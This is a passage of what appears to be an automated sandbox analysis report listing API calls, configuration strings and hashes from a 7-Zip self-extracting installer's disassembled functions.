??3@YAXPAX@Z.MSVCRT(?,?,?,00000000), ref: 0040674B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000), ref: 00406753
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000), ref: 0040675B
GetCurrentProcess.KERNEL32(000000FF,000000FF,?,?,?,?,00000000), ref: 00406767
SetProcessWorkingSetSize.KERNEL32(00000000), ref: 0040676E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 0040678A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 00406792
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040679A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067A2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,00000000), ref: 004067BE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,00000000), ref: 004067C6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067CE
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004067D6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?,?,00000000,?,?), ref: 0040687F
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,00000000,?,?), ref: 004068A4
??3@YAXPAX@Z.MSVCRT(?,00000011,00000000,00000000,?,?,00000000,?,?,?,00000000,?,?), ref: 00406916
CoInitialize.OLE32(00000000), ref: 00406937
lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 00406991
_wtol.MSVCRT ref: 00406A68
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406A8B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00406AC4
GetKeyState.USER32(00000010), ref: 00406B1B
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406C59
??3@YAXPAX@Z.MSVCRT(?), ref: 00406C67
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406C92
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000E,?,?,?,00000000,AutoInstall), ref: 00406C9A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00406CB6
??3@YAXPAX@Z.MSVCRT(?,?), ref: 00406CBE
??3@YAXPAX@Z.MSVCRT(?,00000000), ref: 00406CEE
??3@YAXPAX@Z.MSVCRT(?,0041E9E8), ref: 00406D2E
??3@YAXPAX@Z.MSVCRT(?,0041E9E8), ref: 00406D97
??3@YAXPAX@Z.MSVCRT(?,?,0041E9E8), ref: 00406D9F
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E64
??3@YAXPAX@Z.MSVCRT(00000001,?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E6F
GetFileAttributesW.KERNEL32(?,00000000,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406E79
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406F33
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00406F3B
_wtol.MSVCRT ref: 00406FCF
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?,?,?,?,?), ref: 004071AE
??3@YAXPAX@Z.MSVCRT(00000000,?,?,00000000,?,?,?,?,?,?), ref: 004071B6
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004071DA
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00407223
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040722B
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407233
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00407239
??3@YAXPAX@Z.MSVCRT(?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407249
??3@YAXPAX@Z.MSVCRT(?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407251
??3@YAXPAX@Z.MSVCRT(?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040726E
??3@YAXPAX@Z.MSVCRT(?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407276
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040727E
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 00407286
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000000,0000000F,?,?,?,?,00000000,AutoInstall,?,?,0041E9E8), ref: 0040728E
??3@YAXPAX@Z.MSVCRT(?,?,?,0041E9E8), ref: 004072AF
??3@YAXPAX@Z.MSVCRT(?,?,?,?,0041E9E8), ref: 004072B7
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004072C3

Part of subcall function 00409606: wvsprintfW.USER32(?,00000000,?), ref: 0040962A
Part of subcall function 00409606: GetLastError.KERNEL32 ref: 0040963B
Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,00000000,?,?,00000000,004072DC), ref: 00409663
Part of subcall function 00409606: FormatMessageW.KERNEL32(00001100,00000000,?,00000000,?,00000000,004072DC), ref: 00409678
Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 0040968B
Part of subcall function 00409606: lstrlenW.KERNEL32(?), ref: 00409692
Part of subcall function 00409606: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004096A7
Part of subcall function 00409606: lstrcpyW.KERNEL32(00000000,?), ref: 004096BD
Part of subcall function 00409606: lstrcpyW.KERNEL32(-00000002,?), ref: 004096CE
Part of subcall function 00409606: ??3@YAXPAX@Z.MSVCRT(00000000,00000000), ref: 004096D7
Part of subcall function 00409606: LocalFree.KERNEL32(?), ref: 004096E1

??3@YAXPAX@Z.MSVCRT(?,00000001,00000010,?), ref: 004072E4
??3@YAXPAX@Z.MSVCRT(?,?,00000001,00000010,?), ref: 004072EC
??3@YAXPAX@Z.MSVCRT(?,?,?,00000001,00000010,?), ref: 004072F4
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000001,00000010,?), ref: 004072FA
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00000001,00000010,?), ref: 00407302
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,00000001,00000010,?), ref: 0040730A
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,00000001,00000010,?), ref: 00407312
??3@YAXPAX@Z.MSVCRT(?,00000000,?,?), ref: 00407331
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 00407339
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407341
??3@YAXPAX@Z.MSVCRT(?,?,?,?,00000000,?,?), ref: 00407347
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000000,?,?), ref: 00407380
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 004073AA
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040746E
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 00407476
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 0040748D
??3@YAXPAX@Z.MSVCRT(?,?,00000000,?,?), ref: 004074A1
??3@YAXPAX@Z.MSVCRT(?,?,?,00000000,?,?), ref: 004074A9
MessageBoxA.USER32(00000000,Sorry, this program requires Microsoft Windows 2000 or later.,7-Zip SFX,00000010), ref: 004074C2

Strings

7zSfxVarSystemLanguage, xrefs: 00405D52
7zSfxString%d, xrefs: 0040628F
BeginPrompt, xrefs: 00406AEB
7zSfxVarCmdLine0, xrefs: 00405D12
SelfDelete, xrefs: 0040645F, 0040743C
x64, xrefs: 00407061
7zSfxVarSystemPlatform, xrefs: 00405D07
0A, xrefs: 0040603D
GUIMode, xrefs: 004063D9
" -, xrefs: 004066E4
sfxconfig, xrefs: 00405FEE, 004061C0
x86, xrefs: 00405CEF, 00407028
bpt, xrefs: 004064C7
xk, xrefs: 004060F4
A, xrefs: 00406951
waitall, xrefs: 00406EA5
7zSfxVarCmdLine2, xrefs: 004062CD, 00406675
i386, xrefs: 0040703B
7zSfxVarModulePlatform, xrefs: 00405CF4
A, xrefs: 00406CDE
ExecuteParameters, xrefs: 004070C7
sfxversion, xrefs: 00405DB3
0A, xrefs: 00406047
0A, xrefs: 00405E4F
nowait, xrefs: 00406F68
forcenowait, xrefs: 00406F8C
7ZipSfx.%03x, xrefs: 00406CD1
Shortcut, xrefs: 00407367
pA, xrefs: 00405F55
$A, xrefs: 0040610C
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 004074BB
shc, xrefs: 00406FE4
RunProgram, xrefs: 00406AE0, 00406BFB, 00406C09
SfxAuthor, xrefs: 0040696B
FinishMessage, xrefs: 004073D6
7zSfxVarCmdLine1, xrefs: 0040661A
AutoInstall, xrefs: 00406B51, 00406BAC, 00406F13
InstallPath, xrefs: 00406941
ExecuteFile, xrefs: 00406ADB, 00406BD7, 00406BE5
xk, xrefs: 004060A2, 004060BC, 004060CC, 004060E9
@xk, xrefs: 00406057
sfxelevation, xrefs: 00405E14, 004066DF
hidcon, xrefs: 00406F4A
setup.exe, xrefs: 00406E2C, 00406E31, 00406E8C
123456789ABCDEFGHJKMNPQRSTUVWXYZ, xrefs: 004069BD
SetEnvironment, xrefs: 004067FC, 00406804, 0040688B
OverwriteMode, xrefs: 00406395
A, xrefs: 00406CFC
Delete, xrefs: 0040738F
sfxwaitall, xrefs: 00405DF8
GUIFlags, xrefs: 004063FC
BeginPromptTimeout, xrefs: 004064E0, 00406A55
amd64, xrefs: 0040704E
MiscFlags, xrefs: 0040641F
HelpText, xrefs: 004068CA
7-Zip SFX, xrefs: 004074B6
del, xrefs: 00407004
sfxlang, xrefs: 00405D63

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$Message_wtol$lstrlen$??2@wsprintf$CommandCurrentFileFormatLineModuleProcessTimerlstrcpy$?_set_new_handler@@AttributesCallbackCreateDirectoryDispatchDispatcherErrorFolderFreeHandleInitializeKillLastLocalNamePathSizeSpecialStateUserVersionWindowWorkingwvsprintf
String ID: " -$$A$0A$0A$0A$123456789ABCDEFGHJKMNPQRSTUVWXYZ$7-Zip SFX$7ZipSfx.%03x$7zSfxString%d$7zSfxVarCmdLine0$7zSfxVarCmdLine1$7zSfxVarCmdLine2$7zSfxVarModulePlatform$7zSfxVarSystemLanguage$7zSfxVarSystemPlatform$@xk$AutoInstall$BeginPrompt$BeginPromptTimeout$Delete$ExecuteFile$ExecuteParameters$FinishMessage$GUIFlags$GUIMode$HelpText$InstallPath$MiscFlags$OverwriteMode$RunProgram$SelfDelete$SetEnvironment$SfxAuthor$Shortcut$Sorry, this program requires Microsoft Windows 2000 or later.$amd64$bpt$del$forcenowait$hidcon$i386$nowait$pA$setup.exe$sfxconfig$sfxelevation$sfxlang$sfxversion$sfxwaitall$shc$waitall$x64$x86$xk$xk$A$A$A
API String ID: 1301190434-1010958641
Opcode ID: 80ae3e338bd2c6bf34f732366e6f21bef20734440bf6bcc7836777fffa1ed4bd
Instruction ID: 37b3d77bb6f8fb102f6eda89de8ddb12e9592f0eac1975534991a7b966549d26
Opcode Fuzzy Hash: 80ae3e338bd2c6bf34f732366e6f21bef20734440bf6bcc7836777fffa1ed4bd
Instruction Fuzzy Hash: 69E2E271904208AADF25AF62DC46AEE3768EF04304F54403BFD06B61D2EB7D9991CB5E

Function 00402665 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 19
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(kernel32,GetNativeSystemInfo,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 00402675
GetProcAddress.KERNEL32(00000000), ref: 0040267C
GetNativeSystemInfo.KERNELBASE(?,?,?,?,?,?,0040269B,00405D06,7zSfxVarModulePlatform,x86), ref: 0040268A

Strings

GetNativeSystemInfo, xrefs: 0040266B
kernel32, xrefs: 00402670

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: AddressInfoLibraryLoadNativeProcSystem
String ID: GetNativeSystemInfo$kernel32
API String ID: 2103483237-3846845290
Opcode ID: 19664b54b855b72bcbaa716dd824881a6f451c3f2b4ed8b8d333fe071d6dfa80
Instruction ID: 08739c12cb3b948957cf2c0406c7fd7347f4194bf9f07d28511d247575205d7a
Opcode Fuzzy Hash: 19664b54b855b72bcbaa716dd824881a6f451c3f2b4ed8b8d333fe071d6dfa80
Instruction Fuzzy Hash: AAD05EB0A0520576CB00ABB15D0E9EB7AEC5A48608B144461A806F00C5EAADDD90C36A

Function 0040367D Relevance: 7.5, APIs: 5, Instructions: 45
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetFileAttributesW.KERNELBASE(?,-00000001), ref: 0040368B
SetLastError.KERNEL32(00000010), ref: 004036A0

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: AttributesErrorFileLast
String ID:
API String ID: 1799206407-0
Opcode ID: d36faaefddfd81e2762f97a3370e571bf9c3961ee8d128041245bb49f3de1fe9
Instruction ID: 2afa7e6ed9b3c4e8b0be6899d5053f20146e769dcf51bfeaf0e83b5e475a48be
Opcode Fuzzy Hash: d36faaefddfd81e2762f97a3370e571bf9c3961ee8d128041245bb49f3de1fe9
Instruction Fuzzy Hash: 7001AD30402014BEDB206F759C099EA3B5CAF0132AF204E32F822F23D0D739CB469A5E

Function 0040122A Relevance: 3.0, APIs: 2, Instructions: 42windowCOMMON

Download Yara Rule

APIs

GetDiskFreeSpaceExW.KERNELBASE(?,00000000,00000000), ref: 00401246
SendMessageW.USER32(00008001,00000000,?), ref: 0040129F

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: DiskFreeMessageSendSpace
String ID:
API String ID: 696007252-0
Opcode ID: af37885296c4e33022f6aa73873594c733a529e1bca2c9c6b159ebc59711ebec
Instruction ID: 952f35bfd535ad09d3a1e6728af904cc40037fdc81ed9fa17bdc1f07510a46f8
Opcode Fuzzy Hash: af37885296c4e33022f6aa73873594c733a529e1bca2c9c6b159ebc59711ebec
Instruction Fuzzy Hash: 3F016DB4611208ABEB94DB52DC45F9A77A9AB01714F10807EFD00FA1F0C7B9A9808B1D

Function 00401B0B Relevance: 22.8, APIs: 15, Instructions: 304
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 55ca3ee3d26e98f30d69d3e888b340bde38f36a0fcd7a85b294178b1590f4b85
Instruction ID: f12f3cbfd9e378c4fb4e9f7b852960855991058b71a72fc1bb9c774fc2295476
Opcode Fuzzy Hash: 55ca3ee3d26e98f30d69d3e888b340bde38f36a0fcd7a85b294178b1590f4b85
Instruction Fuzzy Hash: 2CB18071900204EFCF15EFA5C8849EEB7B5FF44304B20852BF812A72A1DB78E945CB59

Function 00402017 Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47
timewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402023
CreateWindowExW.USER32(00000000,Static,0041A584,00000000,000000F6,000000F6,00000005,00000005,00000000,00000000,00000000), ref: 00402040
SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 00402052
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0040205F
DispatchMessageW.USER32(?), ref: 00402069
KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402072
KiUserCallbackDispatcher.NTDLL(00000000,?,?,?,?,?,?,00405C1B,?,00000000), ref: 00402079

Strings

Static, xrefs: 0040203A

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: MessageTimer$CallbackCreateDispatchDispatcherHandleKillModuleUserWindow
String ID: Static
API String ID: 2479445380-2272013587
Opcode ID: 947087521f2d8a527adb1e132fdb1a2ab70df0e469f5237fcb2ff151bfac6e68
Instruction ID: 2d78b022e2fbb31551ae1a24c66cabd830678dfcab2333de03de12e069c17b52
Opcode Fuzzy Hash: 947087521f2d8a527adb1e132fdb1a2ab70df0e469f5237fcb2ff151bfac6e68
Instruction Fuzzy Hash: 2BF062325472217BCA312BA69C4DEEF3E2DEF46BB1F004260F619A11D1DAB94111C6BA

Function 00414491 Relevance: 12.6, APIs: 8, Instructions: 565
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

??2@YAPAXI@Z.MSVCRT(00000018,00000000,?,00000000,?), ref: 00414501
??2@YAPAXI@Z.MSVCRT(00000028,00000000,00000000,?,00000000,?), ref: 0041454B

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??2@
String ID:
API String ID: 1033339047-0
Opcode ID: 8c275e2cc856adcccae56b2b03b23110c5135f8455b1c708b9d72e7dbd912df9
Instruction ID: b54dbc60db56bc1e6d6afd4c66008574e1cbac59b919e387d83e05da41c529ad
Opcode Fuzzy Hash: 8c275e2cc856adcccae56b2b03b23110c5135f8455b1c708b9d72e7dbd912df9
Instruction Fuzzy Hash: 89321271900249DFCB14DFA5C8848EEBBB5BF88308B14456EF9169B351CB39E985CF98

Function 004039E7 Relevance: 10.6, APIs: 7, Instructions: 145
stringtimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrlenW.KERNEL32(00401A74,00000000,?,?,?,?,?,?,00401A74,?), ref: 004039F4
GetSystemTimeAsFileTime.KERNEL32(?,00401A74,?,?,?,?,00401A74,?), ref: 00403A6A
GetFileAttributesW.KERNELBASE(?,?,?,?,?,00401A74,?), ref: 00403A71
??3@YAXPAX@Z.MSVCRT(?,00401A74,?,?,?,?,00401A74,?), ref: 00403B30

Part of subcall function 004011B7: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011D7
Part of subcall function 004011B7: ??3@YAXPAX@Z.MSVCRT(?,00000000,?,00000000,004014FF,00000003,?,00405C8B,?,00000000), ref: 004011FD

memcpy.MSVCRT(-00000001,00401A74,?,?,?,?,?,00401A74,?), ref: 00403AC2
??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,00401A74,?), ref: 00403AFF
??3@YAXPAX@Z.MSVCRT(?,00000001,0000000C,00401A74,00401A74,?,?,?,?,00401A74,?), ref: 00403B45

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
String ID:
API String ID: 846840743-0
Opcode ID: 61fbb82b866355ca103b6651924008aad8ffda89ca2a341e34f636fd10af957e
Instruction ID: 952cd346550c55d7e35c26256f51fad4d5ed31c9206aabe41908170679320093
Opcode Fuzzy Hash: 61fbb82b866355ca103b6651924008aad8ffda89ca2a341e34f636fd10af957e
Instruction Fuzzy Hash: 4141E836A00112AADB20AF59C841ABF7B7CEB4170AF50413BEC81B21D1D77D5A4286DD

Function 004053B2 Relevance: 10.6, APIs: 7, Instructions: 78
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 004053D6
??3@YAXPAX@Z.MSVCRT(?,00000000,00000000,?,?), ref: 0040542F
??3@YAXPAX@Z.MSVCRT(00000002,?), ref: 00405437
ShellExecuteExW.SHELL32(?), ref: 00405455
WaitForSingleObject.KERNEL32(004071CC,000000FF), ref: 0040546D
CloseHandle.KERNEL32(004071CC), ref: 00405476
??3@YAXPAX@Z.MSVCRT(?), ref: 0040547D

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ??3@$CloseExecuteHandleObjectShellSingleWaitmemset
String ID:
API String ID: 2700081640-0
Opcode ID: a85339e1bd803a9382c8719e0269a721a92dd258667116cddf8bfe46f874b10c
Instruction ID: a17db50f12ff5cb4ace43bc03755f74cf1bf378a7c310b81d7eb3e61b1d8450d
Opcode Fuzzy Hash: a85339e1bd803a9382c8719e0269a721a92dd258667116cddf8bfe46f874b10c
Instruction Fuzzy Hash: 3D212B71804208ABDB119FD5D885AEFBBB8EF44319F10812BE915B61A1D7785985CF84

Function 00404D0B Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 92
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

#17.COMCTL32(00000000,?,?), ref: 00404D17

Part of subcall function 00402427: GetUserDefaultUILanguage.KERNEL32(00404D27,?,?), ref: 00402431

Part of subcall function 0040247D: GetLastError.KERNEL32(00000000,?,?), ref: 004024CC
Part of subcall function 0040247D: wsprintfW.USER32 ref: 004024DD
Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 004024F2
Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 004024F7
Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402512
Part of subcall function 0040247D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402525
Part of subcall function 0040247D: GetLastError.KERNEL32 ref: 0040252C
Part of subcall function 0040247D: lstrcmpiW.KERNEL32(006B91C8,?), ref: 00402541
Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(006B91C8), ref: 00402551
Part of subcall function 0040247D: SetLastError.KERNEL32(00000003), ref: 00402578
Part of subcall function 0040247D: lstrlenA.KERNEL32(0041B328), ref: 004025AC
Part of subcall function 0040247D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004025C7
Part of subcall function 0040247D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 004025F9

Part of subcall function 0040247D: ??3@YAXPAX@Z.MSVCRT(?), ref: 0040256F
Part of subcall function 0040247D: _wtol.MSVCRT ref: 0040260A
Part of subcall function 0040247D: MultiByteToWideChar.KERNEL32(00000000,0041B328,00000001,006B91C8,00000002), ref: 0040262A

SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,?,?,?), ref: 00404D9D
wsprintfW.USER32 ref: 00404DB8

Part of subcall function 004035CF: ??2@YAPAXI@Z.MSVCRT(00000018,?,00405789,?,00405D01,?,?,?,?,00405D01,7zSfxVarModulePlatform,x86), ref: 004035D4

Strings

7zSfxFolder%02d, xrefs: 00404DB2
xk, xrefs: 00404D48

Memory Dump Source

Source File: 00000007.00000002.3473078211.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.3472996480.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473535395.000000000041A000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3473955510.000000000041E000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000007.00000002.3474051802.0000000000423000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_b3712f1a7c.jbxd

Similarity

API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
String ID: 7zSfxFolder%02d$xk
API String ID: 3387708999-1399797739
Opcode ID: d34a03c5dd54725b1acb63832af8b25ea8c8f143a98a30686e2398e18eee94ac
Instruction ID: 1fdf757244b44e0294be47ca2d8d1062c2b35c8cdb495cdfc6011dfc87a7cf41
Opcode Fuzzy Hash: d34a03c5dd54725b1acb63832af8b25ea8c8f143a98a30686e2398e18eee94ac
